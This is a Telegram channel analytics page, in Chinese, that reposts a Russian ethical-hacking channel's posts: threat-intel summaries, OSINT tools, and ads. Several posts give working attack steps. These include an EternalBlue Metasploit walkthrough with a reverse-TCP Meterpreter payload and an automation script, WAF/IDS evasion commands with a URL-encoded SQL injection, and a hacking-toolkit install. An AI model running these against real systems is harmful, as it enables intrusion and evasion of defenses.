CodeGuard: PySec Edition
关闭频道
Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
显示更多📈 Telegram 频道 CodeGuard: PySec Edition 的分析概览
频道 CodeGuard: PySec Edition 是活跃参与者。目前社区聚集了 14 192 名订阅者,在 技术与应用 类别中位列第 8 724,并在 俄罗斯 地区排名第 45 616 位。
📊 受众指标与增长动态
自 невідомо 创建以来,项目保持高速增长,吸引了 14 192 名订阅者。
根据 29 九月, 2026 的最新数据,频道保持稳定运转。过去 30 天订阅人数变化为 873,过去 24 小时变化为 56,整体触达仍然可观。
- 认证状态: 未认证
- 互动率 (ER): 平均受众互动率为 9.97%。内容发布后 24 小时内通常能获得 5.53% 的反应,占订阅者总量。
- 帖子覆盖: 每篇帖子平均可获得 1 413 次浏览,首日通常累积 784 次浏览。
- 互动与反馈: 受众积极参与,单帖平均反应数为 6。
- 主题关注点: 内容集中在 codeguard, pysec, docker, grep, контейнер 等核心主题上。
📝 描述与内容策略
作者将该频道定位为表达主观观点的平台:
“Канал по ИБ и этичному хакингу.
Автор: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Рекламный менеджер: @Diggsale
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
凭借高频更新(最新数据采集于 30 九月, 2026),频道始终保持新鲜度与高覆盖。分析显示受众积极互动,使其成为 技术与应用 类别中的关键影响点。
14 192
订阅者
+5624 小时
+1687 天
+87330 天
帖子存档
14 192
👩💻 Нежданные гости: F6 проанализировала первые масштабные атаки группы Kinsing на российские компании
Весной 2025 года один из клиентов F6 зафиксировал попытку кибератаки на свои внешние сервера. Со списком IP-адресов, с которых велась атака, он обратился к аналитикам F6 Threat Intelligence за атрибуцией.
В результате тщательной проверки индикаторов компрометации (IoCs), анализа сетевого трафика, корреляции с внешними источниками Threat Intelligence и сопоставления выявляемых тактик, техник и процедур (TTP) злоумышленника мы вышли на след группировки Kinsing , которая прежде предпочитала действовать за пределами России, а в 2025 году устроила масштабные атаки на российские компании.
Группа Kinsing, известная также как H2Miner и Resourceful Wolf, действует с 2019 года. Специализируется на криптоджекинге, в первую очередь – на майнинге криптовалюты Monero, а также на создании и расширении ботнетов. Во втором квартале 2025 года департамент киберразведки (Threat Intelligence) компании F6 зафиксировал волну атак группировки Kinsing на российские компании из сфер финансов, логистики и телекома. Целью этих атак было заражение устройств вредоносным ПО Kinsing и Xmrig для майнинга криптовалют.В этом отчёте мы подробно расскажем о ходе исследования – от исходных данных и применённых методов анализа до итоговой атрибуции атаки и предоставленных рекомендаций, – которое не только позволило установить злоумышленников, но и раскрыть попытки их атак на другие компании из России. 💀 Читать полностью на Хабре 😈 CodeGuard | #cybersecurity
14 192
«Сети для хакеров» разбираем ключевые сетевые протоколы, на которых строится почти вся работа в сетях — и которые часто становятся целью атак.
🗡 https://youtu.be/Tvr7aSnMVDo?si=1xC6H2yrJOb7hDbk
В этом видео:
DHCP — как работает автоматическая раздача IP и какие есть уязвимости
ARP — основа локальных атак, в том числе ARP-spoofing
FTP — устаревший, но всё ещё опасный протокол для передачи файлов
NAT — принцип маскарадинга и почему он не спасает от всех угроз
SSH — стандарт безопасности, который тоже подвержен атакам
SMB — легендарный протокол, с которого начинались многие атаки
TELNET — устаревший и крайне небезопасный протокол, который до сих пор встречается
Используйте знания только в легальных тестовых стендах!
📱 Cмотреть видео на YouTube
😈 CodeGuard
14 192
🔹 Как ломается RSA512 за 3.5 часа на одном ядре старого ноутбука
Сразу оговорюсь, что обычно я не занимаюсь компьютерной безопасностью и не интересуюсь, а занимаюсь алгоритмами и структурами данных - в прикладном применении это оптимизация быстродействия, высокопроизводительные вычисления типа CUDA, AVX512, многопоточность, что применяется например для майнеров криптовалют. Так я влез в криптоанализ, ибо области, получается, соприкасаются. Был у меня заказ от человека, который хотел очень быстро на видеокартах перемножать 256-битные числа в 512-битные произведения. Я конечно сделал как он хотел, но вот пришла идея: так а зачем перемножать бесчисленное количество чисел, если в принципе можно разложить на множители 512-битное число имея текущие технологии? Об этом дальше и речь.
🪙 Ловите идею?
😈 CodeGuard | #linux
14 192
🥺 Современная разведка глазами профи: интервью с Андреем Безруковым — разведчиком-нелегалом
Андрей Безруков — полковник Службы внешней разведки в отставке, живой пример «нелегального» разведчика с многолетним опытом работы за границей.
💻 Что изменилось в работе разведчика?
🔛 Техника взяла верх — но ключевым остаётся человек.
🔛 Цифровая эпоха — новая среда для разведки и угроз.
🔛 Работа под прикрытием — не кино
🤨 Как вербуют людей и работают «медовые ловушки»?
- В эпоху соцсетей и цифрового следа традиционные методы трансформируются, но человеческий фактор остаётся решающим: доверие, повод помочь, слабости жертвы.
- «Медовые ловушки» — не просто соблазн, а тщательно выстраиваемая психологическая операция.
👩💻 Личный взгляд Андрея Безрукова — что нужно молодым?
- Воспитание патриотизма — основа, которая держит мотивацию и цель.
- Терпение, аналитика, высокая культура общения и постоянное саморазвитие.
- Ценить человеческий фактор, а не надеяться лишь на технологии.
📕Рекомендуемые книги от Андрея Безрукова
1. Про мышление в условиях неопределённости — учимся принимать решения там, где нельзя всё просчитать.
2. Литература по разведке и психологическим операциям — чтобы понять, как работает человек и как его можно склонить.
3. Книги по истории и стратегии — без базовых знаний невозможно строить долгосрочные операции.
⚡️Полное интервью с Андреем Безруковым — мощная и редкая возможность заглянуть за кулисы разведывательной деятельности сегодня:
📱 [Видео на YouTube]
🚀 В эпоху нейросетей и смартфонов разведка — это одновременно и высокотехнологичная аналитика, и тонкое искусство человеческих взаимоотношений. Чем больше ты умеешь слышать и видеть между строк, тем ценнее становишься как разведчик.
😈 CodeGuard | #hacking #OSINT #YouTube
14 192
Подборка каналов IT от наших друзей:
🦥https://t.me/Lazy_Programmer_channel – подпишись, будем лениться вместе
🎬 https://t.me/videos_it — Самая большая база видеоуроков по IT в Рунете
🐧 https://t.me/Linux_Club_nomer_1 — Гайды, статьи и обучающие материалы по Linux. Если хочешь погрузиться в мир Linux, то тебе к нам
📔 https://t.me/Programmirovanie_1 — объёмная библиотека для программистов
🇷🇺 https://t.me/our_computer — От каждого по способностям, каждому по потребностям
🔐 https://t.me/LazySecurity777 — канал по информационной безопасности с разнообразными техническими материалами на разные темы
🤩 https://t.me/iwannabeprogrammer — здесь вы найдёте лучшие IT-мемы и прекрасно проведёте время
🔥 https://t.me/floppydisky — Юмор для программистов
📱 https://t.me/codebase_frontend — Все самое интересное и полезное у нас 😎
14 192
🛡 Атрибуция Exchange-кейлоггеров к группировке PhantomCore
На связи вновь команда киберразведки экспертного центра безопасности Positive Technologies и мы с новым расследованием, которое... как любое, наверно, детективное дело имеет свои предпосылки и всевозможные зацепки. Речь пойдет о группировке PhantomCore и ее темном прошлом, тайны которого мы извлекли на свет...
В июне мы написали про варианты так называемых Exchange-кейлоггеров. И в этом же исследовании было упомянуто несколько кейлоггеров с отправкой собранных данных на сервер злоумышленников. Среди них был один, который отправлял данные на browser.anaiytics.org через заголовки запросов.
Чуть позднее, примерно через неделю, был обнаружен идентичный кейлоггер, отличающийся от первого только внешним сервером...
📖 Читать дальше
😈 CodeGuard | #cybersecurity
14 192
🆒 Практические и этические ресурсы по хакингу, которые вам пригодятся
Сегодня расскажу, где найти все материалы, инструменты и обучающие ресурсы, чтобы учиться эффективно и получать практические навыки в этичном взломе.
🛠 Полезные инструменты для заметок и работы
- Trilium [GitHub] — гибкий блокнот для структурирования знаний по хакингу
- CherryTree [оф. сайт] — мощный оффлайн-заметочник
- Greenshot, FlameShot — скриншоты и аннотации
- Joplin [GitHub] — бесплатный и удобный блокнот, кроссплатформенный
🌐 Основы сетей и подготовка
- Видео "Seven Second Subnetting" — суперкороткий урок по подсетям (YouTube) — да на английском, а что ты хотел
- PDF-инструкция по подсетям — практический гайд по IP и маскам [Google Drive]
🧪Лаборатории и практические стенды
- Kali Linux — базовое «оружие» хакера [официальные образы]
Capstone Boxes — виртуалки для пентестов и тренировки навыков: 1. Новые коробки: [Google Drive] , 2. Старые коробки: [YouTube Demo] — включай translate
🔥 Продвинутые темы
- Linux и Windows Privilege Escalation (повышение прав) [Linux] [Windows]
- Разработка эксплойтов (буферные переполнения) — с отладчиком Immunity Debugger и уязвимым сервером Vulnserver
- Атаки на Active Directory — векторы входа, Mimikatz, Kerberos-проблемы
- OWASP топ-10 уязвимостей — теория и практика тестирования
- Инструменты для сбора информации — theHarvester, sumrecon, breach-parse, Hashcat, mitm6
⚠️ Помни: Все перечисленные материалы и инструменты — для легальной работы с разрешением! Этичный хакинг важен для безопасности и развития.
Этот набор — отличный старт и фундамент для прокачки в этичном хакинге с практикой и поддержкой профи.
Крч просто накидал вам ссылок, ставь 👍 если материал полезный.
😈 CodeGuard | #ethicalhacking #infosec
14 192
🔑 Используем Python и metasploit для автоматизации рутинных задач эксплуатации
Всем привет, у нас выходила статья по автоматизации действий атакующего, но идет время, Python уже получил много новых версий, да и «metasploit» не стоит на месте. Поэтому я постараюсь актуализировать информацию и заодно рассмотрю, как эффективно автоматизировать задачи постэксплуатации.
В процессе изучения Offensive Security (например, на курсах вроде OSCP), практики на CTF-платформах или участии в Bug Bounty-программах рано или поздно сталкиваешься с повторяющимися действиями: одни и те же команды, однотипные модули/утилиты, привычные скрипты. Постоянно запускать все вручную долго, шумно и неэффективно. Решением может стать написание собственных утилит, которые избавят от однотипных рутинных действий. Эта статья будет полезна в первую очередь студентам, изучающим offensive security, практикующимся на CTF-платформах или в рамках подготовки к курсам по информационной безопасности.
В качестве основного языка я выбрал Python, он прост в изучении, популярен, имеет огромное количество библиотек на любой вкус и цвет, а также активно используется в комьюнити: множество Proof of Concept (PoC) эксплойтов пишутся именно на Python. Это позволяет легко интегрировать их в код и анализировать логику атаки.
Второй компонент, но не менее важный, — Metasploit Framework. Он предоставляет обширную базу модулей для эксплуатации и постэксплуатации, а также мощный интерактивный шелл Meterpreter. Даже если вы используете собственные PoC, не реализованные в Metasploit, его возможности остаются крайне полезными для последующих этапов атаки.
💿 Ссылка на статью внутри
😈 CodeGuard | #cybersecurity
14 192
👩💻 5 сервисов для определения геолокации по фото в социальных сетях
В эру соцсетей многие продолжают делиться фото с метками геолокации — опасно с точки зрения приватности и безопасности. OSINT-инструменты позволяют не только собирать информацию, но и использовать её в атаках с элементами социальной инженерии.
Если хотите понять, где кто-то был на самом деле, вот лучшие инструменты для анализа геолокации по фото и постам:
✔️ Huntintel
Универсальный сервис, который определяет геолокацию в постах разных соцсетей. Отлично подходит для широкой разведки, ищет совпадения и выводит точные координаты.
✔️ InstaHunt
Бесплатный инструмент для Instagram. Позволяет найти публикации и истории с привязкой к определённым местам. Хорош для поиска информации по конкретным зонам.
✔️BirdHunt
Аналогичный InstaHunt, но для Twitter. Помогает выследить твиты в подозрительных местах или с конкретной геометкой.
✔️MetaData
Сервис для анализа метаданных файлов, включая фото и картинки. Позволяет увидеть встроенную в файл геолокацию, дату съёмки, модель камеры и другую полезную информацию.
✔️OSINT Geolocation Databases Search
Открытый проект для поиска постов в социальных сетях по геолокационным данным. Отличается продвинутым поиском и работой с большими объёмами данных.
⚙️ Любое фото с включённой геолокацией — это потенциальный источник информации для ваших друзей и врагов. Будьте осторожны, где и что выкладываете, и учитесь защищать свою цифровую приватность.
👍 Поставь лайк, если пост был полезен.
😈 CodeGuard | #OSINT #infosec
14 192
Хватит ли твоих навыков для работы в IT? Не гадай — проверь в этих каналах!
👩💻 Python - t.me/indigo_python
🥶 Hacking - t.me/indigo_hack
👩💻 Web - t.me/indigo_web
👊 Linux & Bash - t.me/linux_bash
Слитые материалы для собеседований - посмотреть
Прием заявок действует до завтра ⚠️
14 192
👊 Как обойти WAF и IDS на пентесте: мини инструкция
WAF (Web Application Firewall) и IDS (Intrusion Detection System) — твои главные враги на первом этапе взлома. Они не дадут залететь стандартными атаками и быстро заблокируют шум. Для новичков — это испытание, но с правильным подходом и пониманием — это реально.
Сегодня расскажу, как не сдуться и обойти их с помощью простых команд и трюков. Всё пошагово и с пояснениями.
1. Как понять, что на пути WAF?
Если запросы падают с ошибками 403, 406, 429 — скорее всего, тебя сливает WAF.
Сначала определим, стоит ли он вообще:
wafw00f https://target.com
*Быстрый сканер, который скажет, защищён ли сайт и каким WAF.*
2. Медленные и тихие сканы на `ffuf`
Стандартные сканеры палят тебя моментально. Забивай на скорость, ставь паузы и делай всё тихо:
ffuf -w /usr/share/wordlists/dirb/common.txt -u https://target.com/FUZZ -p 0.5 -t 10 -o ffuf_results.json
- -p 0.5 — полсекунды между запросами, чтобы не злить WAF/IDS
- -t 10 — не больше 10 потоков, меньше шума
3. Меняем заголовки, чтобы быть незаметным
WAF фильтрует по User-Agent и другим заголовкам — меняй их:
curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" https://target.com/path
curl -H "X-Forwarded-For: 127.0.0.1" https://target.com/path
Используй прокси и VPN, чтобы сменить IP и не светиться.
4. Кодируем ходы, чтобы сбить алгоритм
Пример с URL-кодированием полезной нагрузки:
curl "https://target.com/search?q=%27%20OR%201=1--"
Так SQL-инъекция выглядит неочевидно для WAF.
5. Медленные циклы с рандомной задержкой
Для обхода IDS:
for url in $(cat urls.txt); do
curl -A "Mozilla/5.0" "$url"
sleep $((RANDOM % 5 + 1)) # пауза случайно от 1 до 5 секунд
done
Медленный и нерегулярный трафик сложнее детектировать.
⚠️ Важно: Все инструменты запускай только на легальных целях и с разрешения владельца.
😈 CodeGuard | #pentest #WAF #OSINT #hackingtools14 192
⌨️ Kaisen Linux официально закрыт: что теряют сисадмины и какие есть альтернативы
Линейка дистрибутивов Linux для профессионалов снова сужается: проект Kaisen Linux , созданный в 2019 году для системных администраторов и ИТ-специалистов, прекратил своё существование с релизом версии 3.0. Французский разработчик Кевин Шеврей объявил, что у него больше нет времени на проект из-за личных и профессиональных приоритетов. В отличие от внезапной смерти Clear Linux от Intel, Kaisen будет получать патчи безопасности ещё два года, давая пользователям время на переход. Чем был уникален этот дистрибутив, почему его закрытие важно и что делать дальше — разбираемся в статье.
👩💻 Читать дальше
😈 CodeGuard | #linux
14 192
🛠 Весь арсенал HACKTRONIAN: мощный набор инструментов для пентестинга и информационной безопасности
Если ты занимаешься тестированием на проникновение, HACKTRONIAN — удобным меню инструментов, покрывающим все ключевые направления атак и защиты.
🔎 Меню HACKTRONIAN включает основные категории:
🗣 Сбор информации: Nmap, Setoolkit, сканирование портов, CMS-сканер, Google Dorks и др. Здесь ты собираешь данные о цели и её уязвимостях.
🗣 Атаки на пароли: инструменты типа Cupp и Ncrack для подбора или аудита паролей.
🗣Тестирование беспроводных сетей: reaver, pixiewps, Fluxion — для атаки на Wi-Fi точки доступа.
🗣Инструменты эксплуатации: sqlmap, commix, jboss-autopwn — автоматизация поиска и использования уязвимостей.
🗣Сниффинг и спуфинг: Setoolkit, SSLtrip, pyPISHER помогают перехватывать и модифицировать трафик.
🗣Веб-хакерство: сканеры WordPress/Joomla, Arachni для поиска уязвимостей веб-приложений и эксплойтов.
🗣Взлом частных веб-ресурсов: поиск панелей управления, сканеры SQLi, обходы защиты типа Cloudflare.
🗣Пост эксплуатация: Shell Checker, ПОЭТ, Weeman — инструменты для контроля и углубления доступа после взлома.
🚀 Установка и запуск:
Для Linux:
git clone https://github.com/thehackingsage/hacktronian.git
cd hacktronian
chmod +x install.sh
sudo ./install.sh
hacktronian
Для Android (Termux):
pkg install git python
git clone https://github.com/thehackingsage/hacktronian.git
cd hacktronian
chmod +x hacktronian.py
python2 hacktronian.py
📱 Есть подробный видеоруководство на YouTube для быстрого старта.
💡 Советы:
- Используй HACKTRONIAN как единый центр для запуска известных инструментов, экономя время.
- Комбинируй методы сбора информации и эксплуатации для максимальной эффективности.
- Постоянно обновляй и расширяй свои навыки с помощью этого набора.
😈 CodeGuard | #HACKTRONIAN #hackingtools14 192
🔒 Пентест на автопилоте: что доверить роботам, а что — нет?
ChatGPT генерирует эксплойты, автосканеры находят уязвимости за минуты, а фреймворки сами пишут отчеты. Неужели профессия пентестера обречена? Спойлер: нет, не обречена. Но кардинально меняется.
Современные инструменты творят чудеса. AMASS за полчаса соберет карту субдоменов компании, Nuclei проверит тысячи уязвимостей по готовым шаблонам, а Metasploit поможет получить доступ к системе парой команд. Скорость впечатляет, но есть нюанс. Автоматизация отлично справляется с рутиной и шаблонными задачами, а вот креативное мышление пока остается прерогативой человека. Найти цепочку нестандартных действий, которая приводит к компрометации системы, или понять, что безобидная на вид уязвимость может обанкротить компанию — такое машинам не под силу.
В этой статье Сергей — наш эксперт, который прошел путь от сисадмина до администратора средств защиты и, наконец, пентестера расскажет, где автоматизация незаменима, а где без человеческого мозга не обойтись. Пройдем по всем этапам пентеста от разведки до написания отчета, и посмотрим, как грамотно сочетать силу машин с интуицией специалиста.👩💻 Можете глянуть оригинал 😈 CodeGuard | #cybersecurity
14 192
💻 Использование Metasploit для автоматизированного взлома: быстрый старт с комментариями к bash-командам
Metasploit — это мощный фреймворк для пентестинга и этичного хакинга, который помогает находить и использовать уязвимости в системах. Это, как твой универсальный хакерский нож, который автоматизирует рутинные действия: поиск эксплойтов, настройку атак, постэксплуатацию.
1. Установка Metasploit
curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/msfinstall > msfinstall
# Загружаем официальный скрипт установки Metasploit с GitHub и сохраняем его в файл msfinstall
chmod +x msfinstall
# Делаем скрипт исполняемым (разрешаем запуск)
sudo ./msfinstall
# Запускаем скрипт с правами суперпользователя для установки Metasploit на систему
2. Запуск консоли Metasploit
msfconsole
# Запускаем Metasploit в интерактивном режиме — консоль откроется и готова к командам
3. Поиск подходящего эксплойта
search smb
# Ищем все эксплойты и модули, в названии или описании которых есть "smb" — часто используется в атаках на протокол SMB (например, EternalBlue)
4. Выбор эксплойта для работы
use exploit/windows/smb/ms17_010_eternalblue
# Загружаем модуль EternalBlue — один из самых известных эксплойтов для уязвимости в SMB
5. Просмотр и настройка параметров
show options
# Показываем список необходимых параметров для эксплойта — куда нужно указать цели, параметры для подключения и прочее
6. Установка IP и порта цели
set RHOST 192.168.1.100
# RHOST — IP адрес устройства жертвы, куда нацелена атака
set RPORT 445
# RPORT — порт для подключения (445 — стандартный порт SMB)
7. Настройка полезной нагрузки (payload) и параметров обратного подключения
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# Payload — что именно будет выполнено после успешного взлома. Meterpreter — мощная оболочка для управления системой.
set LHOST 192.168.1.50
# LHOST — твой локальный IP-адрес, чтобы жертва могла "позвонить" тебе обратно (обратное TCP-соединение)
set LPORT 4444
# LPORT — порт, на который будет установлен обратный канал связи
8. Запуск эксплойта
exploit
# Запускаем атаку, Metasploit пытается использовать эксплойт и payload для получения доступа
9. Работа с открытыми сессиями
sessions
# Показывает список открытых сессий — активных подключений к "взломанным" машинам
10. Подключение к сессии
sessions -i 1
# Подключаемся к сессии с номером 1 для интерактивного управления удалённой системой
11. Выполнение команд в shell
shell
# Запускаем системный shell удалённого устройства – теперь можно выполнять команды, как будто ты физически работаешь на той машине
ls -la
# Команда списка файлов и папок с подробной информацией — пример простой команды для проверки доступа
12. Автоматизация через resource-файл
Создаём файл auto.rc с содержимым:
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.100
set RPORT 445
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
exploit
Запуск:
msfconsole -r auto.rc
# Запускаем msfconsole и сразу подгружаем команды из файла auto.rc — автоматизируем весь процесс и не вводим всё вручную
Важные советы для новичков
- Всегда запускай Metasploit на легальных целях и с разрешения владельцев.
- Перед тестом изучай публичные уязвимости и документацию выбранного модуля.
- Используй help и info для подробной информации о командах и эксплойтах.
- Meterpreter-сессии дают огромные возможности — от запуска команд до снятия скриншотов.
- Постепенно изучай post-exploitation модули для расширения контроля над системой.
🤔 Этот мини-гайд — базовый старт для погружения в Metasploit.
ставь реакцию 👍 и поделись постом с другом
😈 CodeGuard | #Metasploit #hackingtools14 192
🔓 [Перевод] Stealth Mode: 10 Bash-трюков для скрытого хакинга
В мире этичного хакинга, быть невидимым зачастую так же важно, как и получить первичный доступ. Подумайте сами: если вы проникнете в систему, но оставите за собой следы в логах, идентификаторах процессов и временных метках файлов, то практически оставите свою подпись на месте преступления.
Этот гайд посвящен скрытности и bash -скриптингу. Мы говорим не о супер эксплойтах, а о низкоуровневой невидимости, которая заставит команду криминалистов чесать затылки.
😵💫 Интересно? Тогда сюда
😈 CodeGuard | #cybersecurity
14 192
💀 Linux глазами хакера Автор: Михаил Фленов Год издания: 2021Книга, если ты хочешь не просто использовать Linux, а понимать, как он работает изнутри — эта книга станет твоим главным руководством. Не про "как поставить систему". Про как сделать её безопасной, производительной и защищённой. 🧠Что внутри? - Базовое администрирование и управление доступом - Настройка Firewall и защита от атак - Настройка серверов: WEB, FTP, Proxy, DNS - Программы для электронной почты и файлообмена - Политика мониторинга и архивирования данных - Потенциальные уязвимости и как их избежать - Что делать при атаке или взломе — восстановление и предотвращение потери данных - Тестирование безопасности конфигурации (обновлённая информация для Ubuntu) 📌 В шестом издании — актуальная информация и новые инструменты для проверки безопасности. 🔝 Подходит: - Администраторам Linux - Специалистам по безопасности - Тем, кто хочет **понимать, как работает система, а не просто запускать команды** - Всем, кто хочет **строить безопасную и надёжную инфраструктуру** Безопасность начинается с понимания: - Как работают процессы в Linux - Как устроены права доступа - Какие службы могут быть уязвимы - Как защитить систему от реальных атак 📌 Эта книга — не про взлом ради взлома. Она про мышление защитника, который знает, как устроена система, чтобы не дать ей быть сломанной. 💠 Бери книгу → [Archive] 😈 CodeGuard | #book #linux #security
